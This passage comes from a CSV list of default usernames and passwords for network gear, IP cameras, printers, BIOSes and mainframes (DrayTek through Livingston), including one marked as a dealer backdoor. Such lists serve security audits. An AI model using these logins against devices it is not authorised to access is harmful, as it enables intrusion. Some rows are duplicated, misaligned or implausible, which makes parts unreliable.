series,,Telnet,draytek,1234,Admin, -Drs,IP Camera system,,HTTP,admin,1234,, -Dupont,Digital Water Proofer,,Telnet,root,par0t,Admin, -DynaColor,IP Camera system,,HTTP,admin,1234,, -Dynalink,RTA020,,Multi,admin,admin,Admin, -Dynalink,RTA230,,Multi,admin,admin,Admin, -E-Con,Econ DSL Router,,Router,admin,epicrouter,Admin,DSL Router -E-Tech,ADSL Ethernet Router,Annex A v2,HTTP,admin,epicrouter,Admin, -E-Tech,ADSL Ethernet Router,Annex A v2,HTTP,admin,epicrouter,Admin,Password can also be password -E-Tech,Router,RTBR03,HTTP,,admin,Admin,1wan/4ports switch router -E-Tech,Wireless 11Mbps Router Model:WLRT03,,HTTP,,admin,Admin, -E-Tech,Wireless 11Mbps Router,,HTTP,,admin,Admin, -ECI,Any,,,,,Admin, -EMC,DS-4100B,,Console,admin,,Admin,EMC Fiber Switch -Edimax,Broadband Router,Hardware: Rev A. Boot Code: 1.0 Runtime Code 2.63,HTTP,admin,1234,Admin, -Edimax,ES-5224RXM,,Multi,admin,123,Admin, -Edimax,EW-7205APL,Firmware release 2.40a-00,Multi,guest,,Admin,http://secunia.com/advisories/11849/ -Edimax,EW-7206APG,,HTTP,admin,1234,Admin, -Edimax,Edimax Fast Ethernet Switch,,HTTP,admin,password,Admin, -Edimax,PS-1203/PS-1205Um/PS-3103,( not applicable ),,admin, OR su@psir,Administration, -Edimax,PS-1208MFG,,,edimax,software01,Admin,for most Edimax HW (?) -Efficient Networks,5851 SDSL Router,,Console,,hs7mwxkk,Admin,On some Covad Routers -Efficient Networks,EN 5861,,Telnet,login,admin,Admin, -Efficient Networks,Speedstream 5711,Teledanmark version (only .dk),Console,,4getme2,Admin,for all your TDC router needs -Efficient,,,,,,, -Efficient,5851,,Telnet,login,password,Admin,might be all 5800 series -Efficient,5871 DSL Router,v 5.3.3-0,Multi,login,admin,Admin,This is for access to HTTP admin console. -Efficient,Speedstream DSL,,Telnet,,admin,Admin, -Elron,Firewall,2.5c,,hostname/ ip address,sysadmin,Admin, -Elsa,LANCom Office ISDN Router,800/1000/1100,Telnet,,cisco,Admin, -Enox,PC BIOS,,Console,,xo11nE,Admin, -Enterasys,ANG-1105,unknown,HTTP,admin,netadmin,Admin,default IP is 192.168.1.1 -Enterasys,ANG-1105,unknown,Telnet,,netadmin,Admin, -Enterasys,ANG-1105,unknown,Telnet,,netadmin,Admin,default IP is 192.168.1.1 -Enterasys,Vertical Horizon,ANY,Multi,admin,,Admin,this works in telnet or http -Enterasys,Vertical Horizon,VH-2402S,Multi,tiger,tiger123,Admin, -Entrust,getAccess,4.x and 7.x,Web Admin gui,websecadm,changeme,Admin,Access to Admin Gui via /sek-bin/login.gas.bat -Epox,PC BIOS,,Console,,central,Admin, -Ericsson ACC,Tigris Platform,All,Multi,public,,Guest, -Ericsson,ACC,,,netman,netman,, -Ericsson,BP250,,HTTP,admin,default,Admin, -Ericsson,Ericsson Acc,,,netman,netman,, -Ericsson,MD110,,Telnet,MD110,help,Admin, -Ericsson,SBG,3.1,,expert,expert,, -Ericsson,md110 pabx,up-to-bc9,Multi,,help,varies depending on config minimal list access by default, -Erpepe,ADSL Router,,Telnet,chochete,tiabuena,Admin, -EverFocus,PowerPlex,EDR1600,Multi,admin,admin,Admin, -EverFocus,PowerPlex,EDR1600,Multi,operator,operator,Admin, -EverFocus,PowerPlex,EDR1600,Multi,supervisor,supervisor,Admin, -Exabyte,Magnum20,,FTP,anonymous,Exabyte,Admin, -Extended Systems,Print Servers,,,admin,extendnet,Admin, -Extreme Networks,All Switches,,Multi,admin,,Admin, -Extreme,All,All,,Admin,,, -F5,Bigip 540,,Multi,root,default,Admin, -F5-Networks,BIGIP,,Multi,,,Admin, -Fast-wi,COOG001,,HTTP,admin,admin,Administrator, -Fastwire,Fastwire Bank Transfer,,,fastwire,fw,, -Fastwire,Fastwire Bank Transfer,,,fastwire,fw,, -FiberDriver,N-Base Switches,NH208/NH215/NH2016,Multi,,forgot,Admin, -Flir,IP Camera system,,HTTP,admin,fliradmin,, -Flowpoint,100 IDSN,,Telnet,admin,admin,Admin, -Flowpoint,144, 2200 DSL Routers,ALL,,password,, -Flowpoint,2200 SDSL,,Telnet,admin,admin,Admin, -Flowpoint,2200,,,,Serial Num,, -Flowpoint,40 IDSL,,Telnet,admin,admin,Admin, -Flowpoint,DSL,,Telnet,,password,Admin, -Flowpoint,DSL,2000,Telnet,admin,admin,Admin, -Flowpoint,Flowpoint 2200,,Telnet,,Serial Number,Admin, -Flowpoint,Flowpoint DSL,,,admin,admin,Admin, -Fortinet,Fortigate,,Console,maintainer,admin,Admin, -Fortinet,Fortigate,,Console,maintainer,bcpb+serial#,Admin,serial# has to be in caps -Fortinet,Fortigate,,Telnet,admin,,Admin, -Foscam,IP Camera system,,HTTP,admin,,, -Foundry Networks,IronView Network Manager,Version 01.6.00a (service pack) 0620031754,HTTP,admin,admin,Admin,http://www.foundrynet.com/services/documentation/nms/FEManager_Installation.html -Freetech,BIOS,,Console,,Posterie,Admin, -Freetech,PC BIOS,,Console,,Posterie,Admin, -FritzBox,Wireless,Fon 5010,HTTP,admin,admin,Administrator, -FritzBox,Wireless,Fon 5140,HTTP,admin,admin,Administrator, -FritzBox,Wireless,Fon Annex A,HTTP,admin,admin,Administrator, -FritzBox,Wireless,Fon WLAN 7570,HTTP,admin,fritzfonbox,Administrator, -FritzBox,Wireless,SL WLAN,HTTP,admin,admin,Administrator, -FritzBox,Wireless,WLAN 3030,HTTP,admin,admin,Administrator, -FritzBox,Wireless,WLAN 3050,HTTP,admin,admin,Administrator, -FritzBox,Wireless,WLAN 7113,HTTP,admin,admin,Administrator, -FritzBox,Wireless,WLAN 7141,HTTP,admin,admin,Administrator, -FritzBox,Wireless,WLAN 7170,HTTP,admin,admin,Administrator, -Fujitsu Siemens,Fibre Channel SAN storage FX 60,,HTTP,manage,!manage,Admin, -Fujitsu Siemens,Fibre Channel SAN storage FX 60,,Telnet,manage,!manage,Admin, -Fujitsu Siemens,Fibre Channel SAN storage,,HTTP,manage,!manage,Admin, -Fujitsu Siemens,Fibre Channel SAN storage,,Telnet,manage,!manage,Admin, -Fujitsu Siemens,Routers,,HTTP,,connect,Admin, -Funk Software,Steel Belted Radius,3.x,Proprietary,admin,radius,Admin, -GVC,e800/rb4,,HTTP,Administrator,admin,Admin, -GVI,IP Camera system,,HTTP,Admin,1234,, -Galacticomm,Major BBS,,Multi,Sysop,Sysop,Admin, -GarrettCom,Magnum Switch,,HTTP,manager,manager,,https://garrettcom-support.belden.com/en/kb/articles/reset-password-or-lost-manager-password-2 -Gateway,Solo,,Multi,,,Admin, -GeoVision,IP Camera system,,HTTP,admin,admin,, -Gericom,Phoenix,,Multi,Administrator,,Admin, -Gigabyte,Gigabyte,,Multi,,,Admin, -GoNET,General Equipment(?),,,fast,adb234,Admin, -Google,Urchin,ANY,Administrator,admin,urchin,Admin Access, -Grandstream,GXP-2000,,HTTP,admin,1234,Admin, -Grandstream,IP Camera system,,HTTP,admin,admin,, -GuardOne,BizGuard,,Multi,n.a,guardone,Admin, -Guru,Wireless ADSL2,,HTTP,admin,admin,Admin, -HC-05 Bluetooth Module,HC-05 for Arduino,,BLUETOOTH,,1234,, -HIKVision,IP Camera system,,HTTP,admin,12345,, -HP,E1200,Network Storage Router,,root,password,admin, -HP,HP 1820-24G-PoE+ J9983A,,HTTP,admin,,Administrator, -HP,HP 2000/3000 MPE/XX,,MULTI,HELLO,OP.OPERATOR,, -HP,HP 2000/3000 MPE/XX,,MULTI,MGR,ITF3000,, -HP,HP 2000/3000 MPE/XX,,MULTI,MGR,NETBASE,, -HP,ISEE,,Multi,admin,isee,Admin, -HP,MSL Series Libraries,,Multi,Factory,56789,Admin,Factory password under Utilities. For all functions unlocked. -HP,t5000 Thin Client series,,Console,Administrator,admin,Admin, -Hewlett Packard,Power Manager,3,HTTP,admin,admin,Admin, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HP,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HPOFFICE DATA,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPONLY,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPP187 SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPWORD PUB,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,LOTUS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,MANAGER,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,MGR,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,SERVICE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,SUPPORT,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,HELLO,FIELD.SUPPORT,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,HELLO,MANAGER.SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,HELLO,MGR.SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,HELLO,OP.OPERATOR,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MAIL,HPOFFICE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MAIL,MAIL,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MAIL,MPE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MAIL,REMOTE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MAIL,TELESUP,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,COGNOS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,HPOFFICE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,ITF3000,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SECURITY,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TCH,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TELESUP,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGE,VESOFT,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,CAROLIAN,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,CCC,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,CNAS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,COGNOS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,CONV,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPDESK,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPOFFICE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPONLY,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP187,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP189,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP196,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,INTX3,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,ITF3000,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,NETBASE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,REGO,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,RJE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,ROBELLE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,SECURITY,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,TELESUP,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,VESOFT,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,WORD,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,XLSERVER,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,COGNOS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,DISC,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SUPPORT,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYSTEM,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,PCUSER,SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,RSBCMON,SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,SPOOLMAN,HPOFFICE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,WP,HPOFFICE,, -Hewlett-Packard,LaserJet Net Printers,Has Jetdirect,9100,,,User, -Hewlett-Packard,LaserJet Net Printers,Has Jetdirect,Telnet,,,Admin, -Hewlett-Packard,LaserJet Net Printers,Ones with Jetdirect on them,9100,,,User,Type what you want and close telnet session to printit out -Hewlett-Packard,LaserJet Net Printers,Ones with Jetdirect on them,FTP,Anonymous,,User,send files to be printed -submit -Hewlett-Packard,LaserJet Net Printers,Ones with Jetdirect on them,HTTP,,,Admin,HTTP interface -submit -Hewlett-Packard,LaserJet Net Printers,Ones with Jetdirect on them,Telnet,,,Admin,press enter twice if no response in telnet -Hewlett-Packard,Omnibook XE3,,Multi,,,Admin, -Hewlett-Packard,Vectra,,Console,,hewlpack,Admin, -Hewlett-Packard,notebook,,Multi,,,Admin, -Hewlett-Packard,omnibook 4150b,,Multi,,(nessun),Admin, -Hewlett-Packard,omnibook,xe3,Multi,,admin,Admin, -Hewlett-Packard,omnibook6000,m,Multi,,,Admin, -Hewlett-Packard,webmin,0.84,HTTP,admin,hp.com,Admin, -Hitron Technologies,CGN5-AP Router,6.1.8.0.2b6,HTTP,admin,password,Administrator, -Hitron Technologies,CGN5-AP Router,6.1.8.0.2b6,Telnet,msoadmin,kbro-TFM,Administrator,Taiwan Fixed Network Only -Hitron Technologies,CGNV5-MAX Router,6.1.5.0.1b9-MGCP,HTTP,cusadmin,password,Administrator, -Honeywell,IP Camera system,,HTTP,administrator,1234,, -Huawei, 4G wingle, E3531, HTTP, admin,admin,, -Huawei,All Router Models,V200R005C30 - V300R003C10,Multi,admin,Admin@huawei,, -Huawei,All Router Models,V300R019C00 and later versions,Multi,admin,admin@huawei.com,, -Huawei,E960,,,admin,admin,Admin, -Huawei,HG531 v1,,,admin,@HuaweiHgw,admin, -Huawei,Home Gateway HG255s,,Multi,admin,superonline,admin, -Huawei,MT880,,HTTP,admin,admin,Admin, -Huawei,MT880r,,Multi,TMAR#HWMT8007079,,Admin,mpacheco.inimigo.com -Huawei,mt820,V100R006C01B021,HTTP,admin,admin,Admin,Telefonica Colombia ADSL -Hyland Software Inc.,Nuxeo,ANY,HTTP,Administrator,Administrator,Administrator,https://doc.nuxeo.com/nxdoc/authentication-and-user-management/ -IBM,2210,RIP,,def,trade,, -IBM,2628,,Multi,,,Admin, -IBM,3534 F08 Fibre Switch,,Multi,admin,password,Admin, -IBM,3583 Tape Library,,HTTP,admin,secure,Admin, -IBM,390e,,Multi,,admin,Admin, -IBM,600x,,Multi,,admin,Admin, -IBM,8224 HUB,,Multi,vt100,public,Admin,Swap MAC address chip from other 8224 -IBM,8225,,Multi,I5rDv2b2JjA8Mm,A52896nG93096a,Admin, -IBM,8239 Token Ring HUB,2.5,Console,,R1QTPS,Utility Program, -IBM,A21m,,Multi,,,Admin, -IBM,AIX,,Multi,guest,,User, -IBM,AIX,,Multi,root,ibm,Admin, -IBM,AS/400,,,qpgmr,qpgmr,, -IBM,AS/400,OS/400,,QUSER,QUSER,, -IBM,AS400,,,QSRV,QSRV,, -IBM,Ascend OEM Routers,,Telnet,,ascend,Admin, -IBM,BladeCenter Mgmt Console,,HTTP,USERID,PASSW0RD,Admin, -IBM,DB2,WinNT,,db2admin,db2admin,, -IBM,Directory - Web Administration Tool,5.1,HTTP,superadmin,secret,Admin,Documented in Web Administration Guide -IBM,Hardware Management Console,3,ssh,hscroot,abc123,Admin, -IBM,Hardware Management,3,ssh,hscroot,abc123,Admin, -IBM,IBM,,Multi,,,Admin, -IBM,Infoprint 6700,http://www.phenoelit.de/dpl/dpl.html,Multi,root,,Admin,Also works for older 4400 printers and probably Printronics equivalentsas well. -IBM,LAN Server OS,2.0/2.1/3.0/4.0,,username,password,, -IBM,Lotus Domino Go Web Server (net.commerce edition),ANY ?,,webadmin,webibm,, -IBM,OS/400,,Multi,11111111,11111111,, -IBM,OS/400,,Multi,ibm,password,, -IBM,OS/400,,Multi,ibm,service,, -IBM,OS/400,,Multi,qsecofr,22222222,, -IBM,OS/400,,Multi,qsecofr,qsecofr,, -IBM,OS/400,,Multi,qsrv,qsrv,, -IBM,OS/400,,Multi,qsvr,qsvr,, -IBM,OS/400,,Multi,qsysopr,qsysopr,, -IBM,OS/400,,Multi,secofr,secofr,, -IBM,OS/400,,Multi,sysopr,sysopr,, -IBM,PC BIOS,,Console,,IBM,Admin, -IBM,PC BIOS,,Console,,sertafu,Admin, -IBM,POS CMOS,,Console,ESSEX,,, -IBM,RS/6000,AIX,,root,ibm,, -IBM,Remote Supervisor Adapter (RSA),,HTTP,USERID,PASSW0RD,Admin, -IBM,T20,,Multi,,admin,Admin, -IBM,T42,,HTTP,Administrator,admin,Admin, -IBM,Tivoli,,HTTP,admin,admin,Administrator, -IBM,TotalStorage Enterprise Server,,Multi,storwatch,specialist,Admin, -IBM,VM/CMS,,Multi,$ALOC$,,, -IBM,VM/CMS,,Multi,AP2SVP,,, -IBM,VM/CMS,,Multi,AUTOLOG1,,, -IBM,VM/CMS,,Multi,BATCH1,,, -IBM,VM/CMS,,Multi,CCC,,, -IBM,VM/CMS,,Multi,CMSUSER,,, -IBM,VM/CMS,,Multi,CPRM,,, -IBM,VM/CMS,,Multi,CVIEW,,, -IBM,VM/CMS,,Multi,DEMO1,,, -IBM,VM/CMS,,Multi,DEMO3,,, -IBM,VM/CMS,,Multi,DIRECT,,, -IBM,VM/CMS,,Multi,DISKCNT,,, -IBM,VM/CMS,,Multi,FSFADMIN,,, -IBM,VM/CMS,,Multi,FSFTASK2,,, -IBM,VM/CMS,,Multi,IDMS,,, -IBM,VM/CMS,,Multi,IIPS,,, -IBM,VM/CMS,,Multi,ISPVM,,, -IBM,VM/CMS,,Multi,IVPM2,,, -IBM,VM/CMS,,Multi,MOESERV,,, -IBM,VM/CMS,,Multi,OLTSEP,,, -IBM,VM/CMS,,Multi,OPERATNS,,, -IBM,VM/CMS,,Multi,PENG,,, -IBM,VM/CMS,,Multi,PRODBM,,, -IBM,VM/CMS,,Multi,PSFMAINT,,, -IBM,VM/CMS,,Multi,RDM470,,, -IBM,VM/CMS,,Multi,RSCS,,, -IBM,VM/CMS,,Multi,SAVSYS,,, -IBM,VM/CMS,,Multi,SFCNTRL,,, -IBM,VM/CMS,,Multi,SQLDBA,,, -IBM,VM/CMS,,Multi,SYSADMIN,,, -IBM,VM/CMS,,Multi,SYSDUMP1,,, -IBM,VM/CMS,,Multi,SYSWRM,,, -IBM,VM/CMS,,Multi,TEMP,,, -IBM,VM/CMS,,Multi,VASTEST,,, -IBM,VM/CMS,,Multi,VMARCH,,, -IBM,VM/CMS,,Multi,VMASSYS,,, -IBM,VM/CMS,,Multi,VMBSYSAD,,, -IBM,VM/CMS,,Multi,VMTAPE,,, -IBM,VM/CMS,,Multi,VMUTIL,,, -IBM,VM/CMS,,Multi,VSEMAINT,,, -IBM,VM/CMS,,Multi,VTAM,,, -IBM,a20m,,Multi,,admin,Admin, -IBM,ra6000,AIX Unix,,,,, -IBM,switch,8275-217,Telnet,admin,,Admin, -IBM,thinkpad,,Multi,,,Admin, -IMAI,Traffic Shaper,TS-1012,HTTP,,,Admin,default IP 1.2.3.4 -INFOSMART,SOHO ROUTER,,HTTP,admin,0 or 0000,, -INOVA,ONT4BKP (IP clock),all,Telnet,iclock,timely,Admin,Network clock -IOImage,IP Camera system,,HTTP,admin,admin,, -IPX-DDK,IP Camera system,,HTTP,root,Admidmin,, -IQInvision,IP Camera system,,HTTP,root,system,, -IRC,IRC Daemon,,IRC,,FOOBAR,Acess, -IRCXPro,IRCXPro Server,1.0,IRC,admin,password,Admin, -IRIS,,Multi,PDP11,PDP11,User,, -Iammeter,WEM3080,ANY,Device setup and status,admin,admin,Administrator,https://www.iammeter.com/quickstart/wem3080-quickstart -Iammeter,WEM3080T,ANY,Device setup and status,admin,admin,Administrator,https://www.iammeter.com/quickstart/wem3080t-quickstart -Iiawmd,web page,,HTTP,,,User, -Infoblox,INFOBLOX Appliance,,Multi,admin,,Admin, -Informix,Database,,,informix,informix,, -Infosmart,SOHO router,,HTTP,admin,0,Admin, -Integral Technologies,RemoteView,4,Console,Administrator,letmein,Admin, -Integral,RemoteView,4,Console,Administrator,letmein,Admin, -Intel,460T Express Switch,,Multi,,,Admin, -Intel,510T,Any,,,admin,, -Intel,All Routers,Any,,,babbit,, -Intel,Express 520T Switch,,Multi,setup,setup,User, -Intel,Express 9520 Router,,Multi,NICONEX,NICONEX,User, -Intel,LanRover VPN Gateway,6.0 >,Multi,,shiva,Admin, -Intel,Shiva,,,Guest,,User, -Intel,Shiva,,,root,,Admin, -Intel,Shiva,,Multi,root,,Admin, -Intel,Wireless AP 2011,2.21,Multi,,Intel,Admin, -Intel,Wireless Gateway,3.x,HTTP,intel,intel,Admin, -Intel,lan rover,6.7,Console,root,admin,Admin, -Intel,netstructure,480t,Telnet,admin,,Admin, -Intel,wireless lan access Point,,,,comcomcom,, -Intel/Shiva,Access Port,All,Telnet,admin,hello,Admin, -Intel/Shiva,Mezza ISDN Router,All,Telnet,admin,hello,Admin, -Intelbras,WRN300,ANY,HTTP,admin,admin,, -Interbase,Interbase Database Server,All,Multi,SYSDBA,masterkey,Admin, -Intermec,Mobile LAN,5.25,Multi,intermec,intermec,Admin, -Intershop,Intershop,4,HTTP,operator,$chwarzepumpe,Admin, -Intersystems,Cache Post-RDMS,,Console,system,sys,Admin,Change immediately -Intex,organizer,,Multi,,,Admin, -Intracom,jetSpeed,520/520i,Multi,admin,admin,Admin,L3x -Inventel,Livebox,,Multi,admin,admin,Admin, -Ipswitch,Whats up Gold,6.0,,admin,admin,Admin, -IronPort,Messaging Gateway Appliance,,Multi,admin,ironport,Admin, -Irongate,NetSurvibox 266,1,HTTP,admin,NetSurvibox,Admin, -Iwill,PC BIOS,,Console,,iwill,Admin, -JAHT,adsl router,AR41/2A,HTTP,admin,epicrouter,Admin, -JD Edwards,WorldVision/OneWorld,All(?),Console,JDE,JDE,Admin/SECOFR, -JDE,WorldVision/OneWorld,,Multi,PRODDTA,PRODDTA,Admin,Owner of database tables and objects -JDS Microprocessing,Hydra 3000,r2.02,Console,hydrasna,,Admin,www.hydrasystems.com/h3kdocs/H3R25C04.pdf -JDS,Hydra 3000,r2.02,Console,hydrasna,,Admin,www.hydrasystems.com/ -JVC,IP Camera system,,HTTP,admin,Model# of camera,, -JetWay,PC BIOS,,Console,,spooml,Admin, -Jetform,Jetform Design,,HTTP,Jetform,,Admin, -Jio,Jio Centrum,ANY,Multi,admin,Jiocentrum,, -Jio,JioFi,ANY,ANY,administrator,administrator,, -JioFi,Web UI,ANY,HTTP,administrator,administrator,Administrator,https://jiofilocalhtml.gen.in/ -Juniper,All,Junos 4.4,,root,,, -Juniper,ISG2000,,Multi,netscreen,netscreen,Admin,Just a note - netscreen is now made by Juniper - otherwise no change -Juniper,Netscreen,3.2,Console,serial#,serial#,Admin,Resets to factory settings -KASDA,KD318-MUI,kasda adsl router and modem,Multi,admin,adslroot,Admin, -KASDA,KD318-MUI,kasda adsl router,Multi,admin,adslroot,Admin, -KTI,KS-2260,,Telnet,superuser,123456,special CLI,can be disabled by renaming the regular login name to superuser -KTI,KS2260,,Console,admin,123,Admin, -KTI,KS2600,,Console,admin,123456,Admin, -Kalatel,Calibur DSR-2000e,,Multi,,3477,Admin, -Kalatel,Calibur DSR-2000e,,on-screen menusystem,,8111,restore factory defaults, -Kawa,All,,,,,Admin, -Knox,Arkeia Server,4.2.8-2,,root,,Admin, -Konica Minolta,magicolor 1690MF,,,(non),sysAdmin,Administrator, -Konica Minolta,magicolor 2300 DL,,Multi,,1234,Admin,info from: ftp://ftp.minolta-qms.com/pub/cts/out_going/manuals/2300dl/nic.pdf -Konica Minolta,magicolor 2430DL,All,Multi,,,Admin,Taken from reference manual for product -Konica Minolta,magicolor 5430 DL,,HTTP,admin,administrator,Admin, -Konica/ Minolta,Di 2010f,,HTTP,,0,Admin,Printer configuration interface -Kyocera Printers,2020D,,,,admin00,Admin, -Kyocera,EcoLink,7.2,HTTP,,PASSWORD,Admin, -Kyocera,FS-2020D,,,,admin00,Admin, -Kyocera,Intermate LAN FS Pro 10/100,K82_0371,HTTP,admin,admin,Admin, -Kyocera,Printer,any,,,admin00,, -Kyocera,Telnet Server IB-20/21,,multi,root,root,Admin, -LANCAST,All,,,,,Admin, -LANCOM,IL11,,Multi,,,Admin, -LAXO,IS-194G,1.0a,,admin,admin,admin,192.168.1.254 -LG,Aria iPECS,All,Console,,jannie,maintenance,dealer backdoor password -LG,LAM200E/LAM200R,,Multi,admin,epicrouter,Admin, -LG,LG-N1T1DD1,ANY,HTTP,admin,admin,admin,(Default IP) acquired via DHCP -LGIC,Goldstream,2.5.1,,LR-ISDN,LR-ISDN,Admin, -LOGITECH,LOGITECH MOBILE HEADSET,,BLUETOOTH,,0 or 0000,, -LTS Security,IP Camera system,,HTTP,admin,12345,, -LUCENT,M770,,Telnet,super,super,Admin, -Lanier,Digital Imager,LD124c,HTTP,admin,,Admin, -Lanier,LD335,,HTTP,supervisor,,Admin, -Lantronics,Lantronics Terminal Server,,TCP 7000,,access,Admin, -Lantronics,Lantronics Terminal Server,,TCP 7000,,system,Admin, -Lantronix,ETS16P,,Multi,,,Admin,secondary priv. password: system -Lantronix,ETS32PR,,Multi,,,Admin,secondary priv. password: system -Lantronix,ETS422PR,,Multi,,,Admin,secondary priv. password: system -Lantronix,ETS4P,,Multi,,,Admin,secondary priv. password: system -Lantronix,LPS1-T Print Server,j11-16,TCP 7000,any,system,Admin, -Lantronix,LSB4,,TCP 7000,,system,Admin, -Lantronix,Lantronix Terminal,,TCP 7000,,lantronix,Admin, -Lantronix,MSS110/MSSVIA/UDS10,,TCP 7000,,system,Admin, -Lantronix,SCS100,,Multi,,access,Admin,secondary priv. password: system -Lantronix,SCS1620,,Multi,sysadmin,PASS,Admin,9600/N/8/1 XON/XOFF -Lantronix,SCS200,,Multi,,admin,Admin,secondary priv. password: system -Lantronix,SCS3200,,EZWebCon downloaded from ftp. lantronix.com,login,access,Admin,secondary port settings login: root password: system -Lantronix,SCS3200,,EZWebCon,login,access,Admin, -Lantronix,SCS400,,Multi,,admin,Admin,secondary priv. password: system -Lantronix,Terminal Server,,TCP 7000,,access,Admin, -Lantronix,Terminal Server,,TCP 7000,,lantronix,Admin, -Laradock,MySQL,,Any,default,secret,non-admin,https://laradock.io/documentation/#use-phpmyadmin -Laradock,MySQL,,Any,root,root,admin,check on your laradock .env -Lenel,OnGuard,ANY,HTTP,admin,admin,admin, -Leviton,47611-GT5,,Multi,admin,leviton,Admin, -LinkSys,WAP11,,Multi,,,Admin, -Linksys,ADSLME3,,,root,orion99,Admin,From Telus ISP (Canada) -Linksys,AG 241 - ADSL2 Gateway with 4-Port Switch,,Multi,admin,admin,Admin, -Linksys,BEFSR41,2,HTTP,,admin,Admin, -Linksys,BEFW11S4,1,HTTP,admin,,Admin, -Linksys,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics,192.168.0.1/docsisdevicestatus.asp -Linksys,DSL,,Telnet,,admin,Admin, -Linksys,EtherFast Cable/DSL ROuter,,Multi,Administrator,admin,Admin, -Linksys,EtherFast Cable/DSL Router,,Multi,Administrator,admin,Admin, -Linksys,Linksys DSL,,,,admin,Admin, -Linksys,Linksys Router DSL/Cable,,HTTP,,admin,Admin, -Linksys,WAG354G,2,HTTP,admin,admin,Admin,Applies to other linksys too -Linksys,WAG54G,,HTTP,admin,admin,Admin, -Linksys,WAG54GS,,Multi,admin,admin,Admin, -Linksys,WAP11,,Multi,,,Admin, -Linksys,WAP54G,2,HTTP,,admin,Admin, -Linksys,WRT54G,,HTTP,admin,admin,Admin, -Linksys,WRT54G,All Revisions,HTTP,,admin,Admin, -Linksys,WRT54GS,V4,HTTP,admin,admin,Admin, -Linksys,model WRT54GC compact wireless-G broadband router,,Multi,,admin,Admin, -Linksys,model WRT54GC compact,,Multi,,admin,Admin, -Linksys,rv082,,Multi,admin,,Admin, -Linksys/Cisco,RTP300 w/2 phone ports,1,HTTP,admin,admin,Admin, -Linksys/Cisco,RTP300 w/2 phone ports,1,HTTP,user,tivonpw,update access,use for flashing firmware -Linunx,Linux,,Console,Administrator,admin,Admin, -Linux Mint,Linux Mint Live session,20.2,Uma/CLI/Login,mint,,user, -Linux,Bankmandiri.co.id,,HTTP,Administrator,,Admin, -Linux,Slackware,,Multi,satan,,User, -Linux,Slackware,ANY,Multi,satan,,user, -Linux,UCLinux for UCSIMM,,Multi,root,uClinux,Admin, -Livingston,IRX Router,,Telnet,!root,,, -Livingston,IRX Router,,Telnet,!root,,Admin, -Livingston,Livingston Portmaster 3,,Telnet,!root,,, 